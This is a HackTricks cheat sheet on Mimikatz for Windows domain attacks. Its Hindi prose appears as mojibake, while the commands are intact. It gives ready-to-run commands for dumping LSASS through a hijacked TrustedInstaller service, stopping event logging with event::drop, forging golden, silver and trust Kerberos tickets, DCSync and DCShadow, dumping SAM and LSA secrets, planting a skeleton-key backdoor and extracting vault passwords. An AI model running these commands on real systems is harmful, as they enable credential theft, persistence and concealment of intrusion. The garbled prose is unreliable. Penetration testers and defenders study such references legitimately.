Mimikatz

Support HackTricks

рдпрд╣ рдкреГрд╖реНрда adsecurity.org рд╕реЗ рдЖрдзрд╛рд░рд┐рдд рд╣реИред рдЕрдзрд┐рдХ рдЬрд╛рдирдХрд╛рд░реА рдХреЗ рд▓рд┐рдП рдореВрд▓ рджреЗрдЦреЗрдВ!

LM рдФрд░ рдореЗрдореЛрд░реА рдореЗрдВ рд╕реНрдкрд╖реНрдЯ-рдЯреЗрдХреНрд╕реНрдЯ

Windows 8.1 рдФрд░ Windows Server 2012 R2 рд╕реЗ рдЖрдЧреЗ, рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓ рдЪреЛрд░реА рдХреЗ рдЦрд┐рд▓рд╛рдл рд╕реБрд░рдХреНрд╖рд╛ рдХреЗ рд▓рд┐рдП рдорд╣рддреНрд╡рдкреВрд░реНрдг рдЙрдкрд╛рдп рд▓рд╛рдЧреВ рдХрд┐рдП рдЧрдП рд╣реИрдВ:

  • LM рд╣реИрд╢ рдФрд░ рд╕реНрдкрд╖реНрдЯ-рдЯреЗрдХреНрд╕реНрдЯ рдкрд╛рд╕рд╡рд░реНрдб рдЕрдм рдореЗрдореЛрд░реА рдореЗрдВ рд╕рдВрдЧреНрд░рд╣реАрдд рдирд╣реАрдВ рдХрд┐рдП рдЬрд╛рддреЗ рд╣реИрдВ рддрд╛рдХрд┐ рд╕реБрд░рдХреНрд╖рд╛ рдмрдврд╝ рд╕рдХреЗред рдПрдХ рд╡рд┐рд╢реЗрд╖ рд░рдЬрд┐рд╕реНрдЯреНрд░реА рд╕реЗрдЯрд┐рдВрдЧ, HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest "UseLogonCredential" рдХреЛ 0 рдХреЗ DWORD рдорд╛рди рдХреЗ рд╕рд╛рде рдХреЙрдиреНрдлрд╝рд┐рдЧрд░ рдХрд┐рдпрд╛ рдЬрд╛рдирд╛ рдЪрд╛рд╣рд┐рдП рддрд╛рдХрд┐ рдбрд╛рдЗрдЬреЗрд╕реНрдЯ рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдХреЛ рдирд┐рд╖реНрдХреНрд░рд┐рдп рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХреЗ, рдпрд╣ рд╕реБрдирд┐рд╢реНрдЪрд┐рдд рдХрд░рддреЗ рд╣реБрдП рдХрд┐ "рд╕реНрдкрд╖реНрдЯ-рдЯреЗрдХреНрд╕реНрдЯ" рдкрд╛рд╕рд╡рд░реНрдб LSASS рдореЗрдВ рдХреИрд╢ рдирд╣реАрдВ рдХрд┐рдП рдЬрд╛рддреЗ рд╣реИрдВред

  • LSA рд╕реБрд░рдХреНрд╖рд╛ рдХреЛ рд╕реНрдерд╛рдиреАрдп рд╕реБрд░рдХреНрд╖рд╛ рдкреНрд░рд╛рдзрд┐рдХрд░рдг (LSA) рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреЛ рдЕрдирдзрд┐рдХреГрдд рдореЗрдореЛрд░реА рдкрдврд╝рдиреЗ рдФрд░ рдХреЛрдб рдЗрдВрдЬреЗрдХреНрд╢рди рд╕реЗ рдмрдЪрд╛рдиреЗ рдХреЗ рд▓рд┐рдП рдкреЗрд╢ рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИред рдпрд╣ LSASS рдХреЛ рдПрдХ рд╕рдВрд░рдХреНрд╖рд┐рдд рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреЗ рд░реВрдк рдореЗрдВ рдЪрд┐рд╣реНрдирд┐рдд рдХрд░рдХреЗ рдкреНрд░рд╛рдкреНрдд рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред LSA рд╕реБрд░рдХреНрд╖рд╛ рдХреЛ рд╕рдХреНрд░рд┐рдп рдХрд░рдиреЗ рдореЗрдВ рд╢рд╛рдорд┐рд▓ рд╣реИрдВ:

  1. HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa рдкрд░ рд░рдЬрд┐рд╕реНрдЯреНрд░реА рдХреЛ рд╕рдВрд╢реЛрдзрд┐рдд рдХрд░рдирд╛, RunAsPPL рдХреЛ dword:00000001 рдкрд░ рд╕реЗрдЯ рдХрд░рдирд╛ред

  2. рдПрдХ рд╕рдореВрд╣ рдиреАрддрд┐ рд╡рд╕реНрддреБ (GPO) рдХреЛ рд▓рд╛рдЧреВ рдХрд░рдирд╛ рдЬреЛ рдкреНрд░рдмрдВрдзрд┐рдд рдЙрдкрдХрд░рдгреЛрдВ рдореЗрдВ рдЗрд╕ рд░рдЬрд┐рд╕реНрдЯреНрд░реА рдкрд░рд┐рд╡рд░реНрддрди рдХреЛ рд▓рд╛рдЧреВ рдХрд░рддрд╛ рд╣реИред

рдЗрди рд╕реБрд░рдХреНрд╖рд╛ рдЙрдкрд╛рдпреЛрдВ рдХреЗ рдмрд╛рд╡рдЬреВрдж, Mimikatz рдЬреИрд╕реЗ рдЙрдкрдХрд░рдг рд╡рд┐рд╢рд┐рд╖реНрдЯ рдбреНрд░рд╛рдЗрд╡рд░реЛрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ LSA рд╕реБрд░рдХреНрд╖рд╛ рдХреЛ рдмрд╛рдпрдкрд╛рд╕ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рд╣рд╛рд▓рд╛рдВрдХрд┐ рдРрд╕реЗ рдХрд╛рд░реНрдпреЛрдВ рдХреЛ рдШрдЯрдирд╛ рд▓реЙрдЧ рдореЗрдВ рд░рд┐рдХреЙрд░реНрдб рдХрд┐рдпрд╛ рдЬрд╛рдиреЗ рдХреА рд╕рдВрднрд╛рд╡рдирд╛ рд╣реИред

SeDebugPrivilege рд╣рдЯрд╛рдиреЗ рдХрд╛ рдкреНрд░рддрд┐рдХрд╛рд░

рдкреНрд░рд╢рд╛рд╕рдХреЛрдВ рдХреЗ рдкрд╛рд╕ рдЖрдорддреМрд░ рдкрд░ SeDebugPrivilege рд╣реЛрддрд╛ рд╣реИ, рдЬреЛ рдЙрдиреНрд╣реЗрдВ рдХрд╛рд░реНрдпрдХреНрд░рдореЛрдВ рдХреЛ рдбрд┐рдмрдЧ рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИред рдЗрд╕ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдХреЛ рдЕрдирдзрд┐рдХреГрдд рдореЗрдореЛрд░реА рдбрдВрдк рдХреЛ рд░реЛрдХрдиреЗ рдХреЗ рд▓рд┐рдП рдкреНрд░рддрд┐рдмрдВрдзрд┐рдд рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИ, рдЬреЛ рд╣рдорд▓рд╛рд╡рд░реЛрдВ рджреНрд╡рд╛рд░рд╛ рдореЗрдореЛрд░реА рд╕реЗ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓ рдирд┐рдХрд╛рд▓рдиреЗ рдХреЗ рд▓рд┐рдП рдЙрдкрдпреЛрдЧ рдХреА рдЬрд╛рдиреЗ рд╡рд╛рд▓реА рдПрдХ рд╕рд╛рдорд╛рдиреНрдп рддрдХрдиреАрдХ рд╣реИред рд╣рд╛рд▓рд╛рдБрдХрд┐, рдЗрд╕ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдХреЛ рд╣рдЯрд╛рдиреЗ рдХреЗ рдмрд╛рд╡рдЬреВрдж, TrustedInstaller рдЦрд╛рддрд╛ рдЕрднреА рднреА рдПрдХ рдЕрдиреБрдХреВрд▓рд┐рдд рд╕реЗрд╡рд╛ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдореЗрдореЛрд░реА рдбрдВрдк рдХрд░ рд╕рдХрддрд╛ рд╣реИ:

sc config TrustedInstaller binPath= "C:\\Users\\Public\\procdump64.exe -accepteula -ma lsass.exe C:\\Users\\Public\\lsass.dmp"
sc start TrustedInstaller

рдпрд╣ lsass.exe рдореЗрдореЛрд░реА рдХреЛ рдПрдХ рдлрд╝рд╛рдЗрд▓ рдореЗрдВ рдбрдВрдк рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИ, рдЬрд┐рд╕реЗ рдлрд┐рд░ рдХрд┐рд╕реА рдЕрдиреНрдп рд╕рд┐рд╕реНрдЯрдо рдкрд░ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдирд┐рдХрд╛рд▓рдиреЗ рдХреЗ рд▓рд┐рдП рд╡рд┐рд╢реНрд▓реЗрд╖рд┐рдд рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИ:

# privilege::debug
# sekurlsa::minidump lsass.dmp
# sekurlsa::logonpasswords

Mimikatz Options

Mimikatz рдореЗрдВ рдЗрд╡реЗрдВрдЯ рд▓реЙрдЧ рдЫреЗрдбрд╝рдЫрд╛рдбрд╝ рдореЗрдВ рджреЛ рдореБрдЦреНрдп рдХреНрд░рд┐рдпрд╛рдПрдБ рд╢рд╛рдорд┐рд▓ рд╣реИрдВ: рдЗрд╡реЗрдВрдЯ рд▓реЙрдЧ рдХреЛ рд╕рд╛рдл рдХрд░рдирд╛ рдФрд░ рдирдП рдЗрд╡реЗрдВрдЯреНрд╕ рдХреЗ рд▓реЙрдЧрд┐рдВрдЧ рдХреЛ рд░реЛрдХрдиреЗ рдХреЗ рд▓рд┐рдП рдЗрд╡реЗрдВрдЯ рд╕реЗрд╡рд╛ рдХреЛ рдкреИрдЪ рдХрд░рдирд╛ред рдиреАрдЪреЗ рдЗрди рдХреНрд░рд┐рдпрд╛рдУрдВ рдХреЛ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХрдорд╛рдВрдб рджрд┐рдП рдЧрдП рд╣реИрдВ:

Clearing Event Logs

  • Command: рдпрд╣ рдХреНрд░рд┐рдпрд╛ рдЗрд╡реЗрдВрдЯ рд▓реЙрдЧ рдХреЛ рд╣рдЯрд╛рдиреЗ рдХреЗ рд▓рд┐рдП рд╣реИ, рдЬрд┐рд╕рд╕реЗ рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг рдЧрддрд┐рд╡рд┐рдзрд┐рдпреЛрдВ рдХреЛ рдЯреНрд░реИрдХ рдХрд░рдирд╛ рдХрдард┐рди рд╣реЛ рдЬрд╛рддрд╛ рд╣реИред

  • Mimikatz рдЕрдкрдиреЗ рдорд╛рдирдХ рджрд╕реНрддрд╛рд╡реЗрдЬрд╝ рдореЗрдВ рд╕реАрдзреЗ рдЗрд╡реЗрдВрдЯ рд▓реЙрдЧ рдХреЛ рдЙрд╕рдХреЗ рдХрдорд╛рдВрдб рд▓рд╛рдЗрди рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд╕рд╛рдл рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХреЛрдИ рд╕реАрдзрд╛ рдХрдорд╛рдВрдб рдкреНрд░рджрд╛рди рдирд╣реАрдВ рдХрд░рддрд╛ рд╣реИред рд╣рд╛рд▓рд╛рдБрдХрд┐, рдЗрд╡реЗрдВрдЯ рд▓реЙрдЧ рд╣реЗрд░рдлреЗрд░ рдЖрдорддреМрд░ рдкрд░ Mimikatz рдХреЗ рдмрд╛рд╣рд░ рд╕рд┐рд╕реНрдЯрдо рдЯреВрд▓ рдпрд╛ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд╡рд┐рд╢рд┐рд╖реНрдЯ рд▓реЙрдЧ рдХреЛ рд╕рд╛рдл рдХрд░рдиреЗ рдореЗрдВ рд╢рд╛рдорд┐рд▓ рд╣реЛрддрд╛ рд╣реИ (рдЬреИрд╕реЗ, PowerShell рдпрд╛ Windows Event Viewer рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛)ред

Experimental Feature: Patching the Event Service

  • Command: event::drop

  • рдпрд╣ рдкреНрд░рдпреЛрдЧрд╛рддреНрдордХ рдХрдорд╛рдВрдб рдЗрд╡реЗрдВрдЯ рд▓реЙрдЧрд┐рдВрдЧ рд╕реЗрд╡рд╛ рдХреЗ рд╡реНрдпрд╡рд╣рд╛рд░ рдХреЛ рд╕рдВрд╢реЛрдзрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдбрд┐рдЬрд╝рд╛рдЗрди рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ, рдкреНрд░рднрд╛рд╡реА рд░реВрдк рд╕реЗ рдЗрд╕реЗ рдирдП рдЗрд╡реЗрдВрдЯреНрд╕ рдХреЛ рд░рд┐рдХреЙрд░реНрдб рдХрд░рдиреЗ рд╕реЗ рд░реЛрдХрддрд╛ рд╣реИред

  • Example: mimikatz "privilege::debug" "event::drop" exit

  • privilege::debug рдХрдорд╛рдВрдб рд╕реБрдирд┐рд╢реНрдЪрд┐рдд рдХрд░рддрд╛ рд╣реИ рдХрд┐ Mimikatz рдЖрд╡рд╢реНрдпрдХ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреЗ рд╕рд╛рде рд╕рд┐рд╕реНрдЯрдо рд╕реЗрд╡рд╛рдУрдВ рдХреЛ рд╕рдВрд╢реЛрдзрд┐рдд рдХрд░рддрд╛ рд╣реИред

  • event::drop рдХрдорд╛рдВрдб рдлрд┐рд░ рдЗрд╡реЗрдВрдЯ рд▓реЙрдЧрд┐рдВрдЧ рд╕реЗрд╡рд╛ рдХреЛ рдкреИрдЪ рдХрд░рддрд╛ рд╣реИред

Kerberos Ticket Attacks

Golden Ticket Creation

рдПрдХ Golden Ticket рдбреЛрдореЗрди-рд╡реНрдпрд╛рдкреА рдПрдХреНрд╕реЗрд╕ рдЕрдиреБрдХрд░рдг рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИред рдореБрдЦреНрдп рдХрдорд╛рдВрдб рдФрд░ рдкреИрд░рд╛рдореАрдЯрд░:

  • Command: kerberos::golden

  • Parameters:

  • /domain: рдбреЛрдореЗрди рдХрд╛ рдирд╛рдоред

  • /sid: рдбреЛрдореЗрди рдХрд╛ рд╕реБрд░рдХреНрд╖рд╛ рдкрд╣рдЪрд╛рдирдХрд░реНрддрд╛ (SID)ред

  • /user: рдЕрдиреБрдХрд░рдг рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдоред

  • /krbtgt: рдбреЛрдореЗрди рдХреЗ KDC рд╕реЗрд╡рд╛ рдЦрд╛рддреЗ рдХрд╛ NTLM рд╣реИрд╢ред

  • /ptt: рд╕реАрдзреЗ рдореЗрдореЛрд░реА рдореЗрдВ рдЯрд┐рдХрдЯ рдХреЛ рдЗрдВрдЬреЗрдХреНрдЯ рдХрд░рддрд╛ рд╣реИред

  • /ticket: рдмрд╛рдж рдореЗрдВ рдЙрдкрдпреЛрдЧ рдХреЗ рд▓рд┐рдП рдЯрд┐рдХрдЯ рдХреЛ рд╕рд╣реЗрдЬрддрд╛ рд╣реИред

Example:

mimikatz "kerberos::golden /user:admin /domain:example.com /sid:S-1-5-21-123456789-123456789-123456789 /krbtgt:ntlmhash /ptt" exit

Silver Ticket Creation

Silver Tickets рд╡рд┐рд╢рд┐рд╖реНрдЯ рд╕реЗрд╡рд╛рдУрдВ рддрдХ рдкрд╣реБрдБрдЪ рдкреНрд░рджрд╛рди рдХрд░рддреЗ рд╣реИрдВред рдореБрдЦреНрдп рдХрдорд╛рдВрдб рдФрд░ рдкреИрд░рд╛рдореАрдЯрд░:

  • Command: Golden Ticket рдХреЗ рд╕рдорд╛рди рд▓реЗрдХрд┐рди рд╡рд┐рд╢рд┐рд╖реНрдЯ рд╕реЗрд╡рд╛рдУрдВ рдХреЛ рд▓рдХреНрд╖рд┐рдд рдХрд░рддрд╛ рд╣реИред

  • Parameters:

  • /service: рд▓рдХреНрд╖рд┐рдд рд╕реЗрд╡рд╛ (рдЬреИрд╕реЗ, cifs, http)ред

  • рдЕрдиреНрдп рдкреИрд░рд╛рдореАрдЯрд░ Golden Ticket рдХреЗ рд╕рдорд╛рди рд╣реИрдВред

Example:

mimikatz "kerberos::golden /user:user /domain:example.com /sid:S-1-5-21-123456789-123456789-123456789 /target:service.example.com /service:cifs /rc4:ntlmhash /ptt" exit

Trust Ticket Creation

Trust Tickets рдХрд╛ рдЙрдкрдпреЛрдЧ рдбреЛрдореЗрди рдХреЗ рдмреАрдЪ рд╕рдВрд╕рд╛рдзрдиреЛрдВ рддрдХ рдкрд╣реБрдБрдЪрдиреЗ рдХреЗ рд▓рд┐рдП рд╡рд┐рд╢реНрд╡рд╛рд╕ рд╕рдВрдмрдВрдзреЛрдВ рдХрд╛ рд▓рд╛рдн рдЙрдард╛рдиреЗ рдХреЗ рд▓рд┐рдП рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред рдореБрдЦреНрдп рдХрдорд╛рдВрдб рдФрд░ рдкреИрд░рд╛рдореАрдЯрд░:

  • Command: Golden Ticket рдХреЗ рд╕рдорд╛рди рд▓реЗрдХрд┐рди рд╡рд┐рд╢реНрд╡рд╛рд╕ рд╕рдВрдмрдВрдзреЛрдВ рдХреЗ рд▓рд┐рдПред

  • Parameters:

  • /target: рд▓рдХреНрд╖рд┐рдд рдбреЛрдореЗрди рдХрд╛ FQDNред

  • /rc4: рдЯреНрд░рд╕реНрдЯ рдЦрд╛рддреЗ рдХреЗ рд▓рд┐рдП NTLM рд╣реИрд╢ред

Example:

mimikatz "kerberos::golden /domain:child.example.com /sid:S-1-5-21-123456789-123456789-123456789 /sids:S-1-5-21-987654321-987654321-987654321-519 /rc4:ntlmhash /user:admin /service:krbtgt /target:parent.example.com /ptt" exit

рдЕрддрд┐рд░рд┐рдХреНрдд Kerberos рдХрдорд╛рдВрдб

  • рдЯрд┐рдХрдЯреЛрдВ рдХреА рд╕реВрдЪреА:

  • рдХрдорд╛рдВрдб: kerberos::list

  • рд╡рд░реНрддрдорд╛рди рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╕рддреНрд░ рдХреЗ рд▓рд┐рдП рд╕рднреА Kerberos рдЯрд┐рдХрдЯреЛрдВ рдХреА рд╕реВрдЪреА рдмрдирд╛рддрд╛ рд╣реИред

  • рдХреИрд╢ рдкрд╛рд╕ рдХрд░реЗрдВ:

  • рдХрдорд╛рдВрдб: kerberos::ptc

  • рдХреИрд╢ рдлрд╝рд╛рдЗрд▓реЛрдВ рд╕реЗ Kerberos рдЯрд┐рдХрдЯреЛрдВ рдХреЛ рдЗрдВрдЬреЗрдХреНрдЯ рдХрд░рддрд╛ рд╣реИред

  • рдЙрджрд╛рд╣рд░рдг: mimikatz "kerberos::ptc /ticket:ticket.kirbi" exit

  • рдЯрд┐рдХрдЯ рдкрд╛рд╕ рдХрд░реЗрдВ:

  • рдХрдорд╛рдВрдб: kerberos::ptt

  • рдХрд┐рд╕реА рдЕрдиреНрдп рд╕рддреНрд░ рдореЗрдВ Kerberos рдЯрд┐рдХрдЯ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИред

  • рдЙрджрд╛рд╣рд░рдг: mimikatz "kerberos::ptt /ticket:ticket.kirbi" exit

  • рдЯрд┐рдХрдЯреЛрдВ рдХреЛ рд╣рдЯрд╛рдПрдВ:

  • рдХрдорд╛рдВрдб: kerberos::purge

  • рд╕рддреНрд░ рд╕реЗ рд╕рднреА Kerberos рдЯрд┐рдХрдЯреЛрдВ рдХреЛ рд╕рд╛рдл рдХрд░рддрд╛ рд╣реИред

  • рдЯрд┐рдХрдЯ рд╣реЗрд░рдлреЗрд░ рдХрдорд╛рдВрдб рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рд╕реЗ рдкрд╣рд▓реЗ рд╕рдВрдШрд░реНрд╖реЛрдВ рд╕реЗ рдмрдЪрдиреЗ рдХреЗ рд▓рд┐рдП рдЙрдкрдпреЛрдЧреАред

рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдЫреЗрдбрд╝рдЫрд╛рдбрд╝

  • DCShadow: AD рдСрдмреНрдЬреЗрдХреНрдЯ рд╣реЗрд░рдлреЗрд░ рдХреЗ рд▓рд┐рдП рдПрдХ рдорд╢реАрди рдХреЛ рдЕрд╕реНрдерд╛рдпреА рд░реВрдк рд╕реЗ DC рдХреЗ рд░реВрдк рдореЗрдВ рдХрд╛рд░реНрдп рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдмрдирд╛рдПрдВред

  • mimikatz "lsadump::dcshadow /object:targetObject /attribute:attributeName /value:newValue" exit

  • DCSync: рдкрд╛рд╕рд╡рд░реНрдб рдбреЗрдЯрд╛ рдХрд╛ рдЕрдиреБрд░реЛрдз рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдПрдХ DC рдХреА рдирдХрд▓ рдХрд░реЗрдВред

  • mimikatz "lsadump::dcsync /user:targetUser /domain:targetDomain" exit

рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓ рдПрдХреНрд╕реЗрд╕

  • LSADUMP::LSA: LSA рд╕реЗ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓ рдирд┐рдХрд╛рд▓реЗрдВред

  • mimikatz "lsadump::lsa /inject" exit

  • LSADUMP::NetSync: рдПрдХ рдХрдВрдкреНрдпреВрдЯрд░ рдЦрд╛рддреЗ рдХреЗ рдкрд╛рд╕рд╡рд░реНрдб рдбреЗрдЯрд╛ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ DC рдХрд╛ рдЕрдиреБрдХрд░рдг рдХрд░реЗрдВред

  • NetSync рдХреЗ рд▓рд┐рдП рдореВрд▓ рд╕рдВрджрд░реНрдн рдореЗрдВ рдХреЛрдИ рд╡рд┐рд╢рд┐рд╖реНрдЯ рдХрдорд╛рдВрдб рдкреНрд░рджрд╛рди рдирд╣реАрдВ рдХреА рдЧрдИ рд╣реИред

  • LSADUMP::SAM: рд╕реНрдерд╛рдиреАрдп SAM рдбреЗрдЯрд╛рдмреЗрд╕ рддрдХ рдкрд╣реБрдБрдЪреЗрдВред

  • mimikatz "lsadump::sam" exit

  • LSADUMP::Secrets: рд░рдЬрд┐рд╕реНрдЯреНрд░реА рдореЗрдВ рд╕рдВрдЧреНрд░рд╣реАрдд рд░рд╣рд╕реНрдпреЛрдВ рдХреЛ рдбрд┐рдХреНрд░рд┐рдкреНрдЯ рдХрд░реЗрдВред

  • mimikatz "lsadump::secrets" exit

  • LSADUMP::SetNTLM: рдПрдХ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рд▓рд┐рдП рдирдпрд╛ NTLM рд╣реИрд╢ рд╕реЗрдЯ рдХрд░реЗрдВред

  • mimikatz "lsadump::setntlm /user:targetUser /ntlm:newNtlmHash" exit

  • LSADUMP::Trust: рдЯреНрд░рд╕реНрдЯ рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдЬрд╛рдирдХрд╛рд░реА рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВред

  • mimikatz "lsadump::trust" exit

рд╡рд┐рд╡рд┐рдз

  • MISC::Skeleton: DC рдкрд░ LSASS рдореЗрдВ рдПрдХ рдмреИрдХрдбреЛрд░ рдЗрдВрдЬреЗрдХреНрдЯ рдХрд░реЗрдВред

  • mimikatz "privilege::debug" "misc::skeleton" exit

рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡реГрджреНрдзрд┐

  • PRIVILEGE::Backup: рдмреИрдХрдЕрдк рдЕрдзрд┐рдХрд╛рд░ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВред

  • mimikatz "privilege::backup" exit

  • PRIVILEGE::Debug: рдбрд┐рдмрдЧ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВред

  • mimikatz "privilege::debug" exit

рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓ рдбрдВрдкрд┐рдВрдЧ

  • SEKURLSA::LogonPasswords: рд▓реЙрдЧ рдЗрди рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреЗ рд▓рд┐рдП рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓ рджрд┐рдЦрд╛рдПрдВред

  • mimikatz "sekurlsa::logonpasswords" exit

  • SEKURLSA::Tickets: рдореЗрдореЛрд░реА рд╕реЗ Kerberos рдЯрд┐рдХрдЯ рдирд┐рдХрд╛рд▓реЗрдВред

  • mimikatz "sekurlsa::tickets /export" exit

рд╕рд┐рдб рдФрд░ рдЯреЛрдХрди рд╣реЗрд░рдлреЗрд░

  • SID::add/modify: SID рдФрд░ SIDHistory рдмрджрд▓реЗрдВред

  • рдЬреЛрдбрд╝реЗрдВ: mimikatz "sid::add /user:targetUser /sid:newSid" exit

  • рд╕рдВрд╢реЛрдзрд┐рдд рдХрд░реЗрдВ: рдореВрд▓ рд╕рдВрджрд░реНрдн рдореЗрдВ рд╕рдВрд╢реЛрдзрди рдХреЗ рд▓рд┐рдП рдХреЛрдИ рд╡рд┐рд╢рд┐рд╖реНрдЯ рдХрдорд╛рдВрдб рдирд╣реАрдВ рд╣реИред

  • TOKEN::Elevate: рдЯреЛрдХрдиреЛрдВ рдХрд╛ рдЕрдиреБрдХрд░рдг рдХрд░реЗрдВред

  • mimikatz "token::elevate /domainadmin" exit

рдЯрд░реНрдорд┐рдирд▓ рд╕реЗрд╡рд╛рдПрдБ

  • TS::MultiRDP: рдХрдИ RDP рд╕рддреНрд░реЛрдВ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрдВред

  • mimikatz "ts::multirdp" exit

  • TS::Sessions: TS/RDP рд╕рддреНрд░реЛрдВ рдХреА рд╕реВрдЪреА рдмрдирд╛рдПрдВред

  • рдореВрд▓ рд╕рдВрджрд░реНрдн рдореЗрдВ TS::Sessions рдХреЗ рд▓рд┐рдП рдХреЛрдИ рд╡рд┐рд╢рд┐рд╖реНрдЯ рдХрдорд╛рдВрдб рдкреНрд░рджрд╛рди рдирд╣реАрдВ рдХреА рдЧрдИ рд╣реИред

рд╡реЙрд▓реНрдЯ

  • Windows рд╡реЙрд▓реНрдЯ рд╕реЗ рдкрд╛рд╕рд╡рд░реНрдб рдирд┐рдХрд╛рд▓реЗрдВред

  • mimikatz "vault::cred /patch" exit

HackTricks рдХрд╛ рд╕рдорд░реНрдерди рдХрд░реЗрдВ

Last updated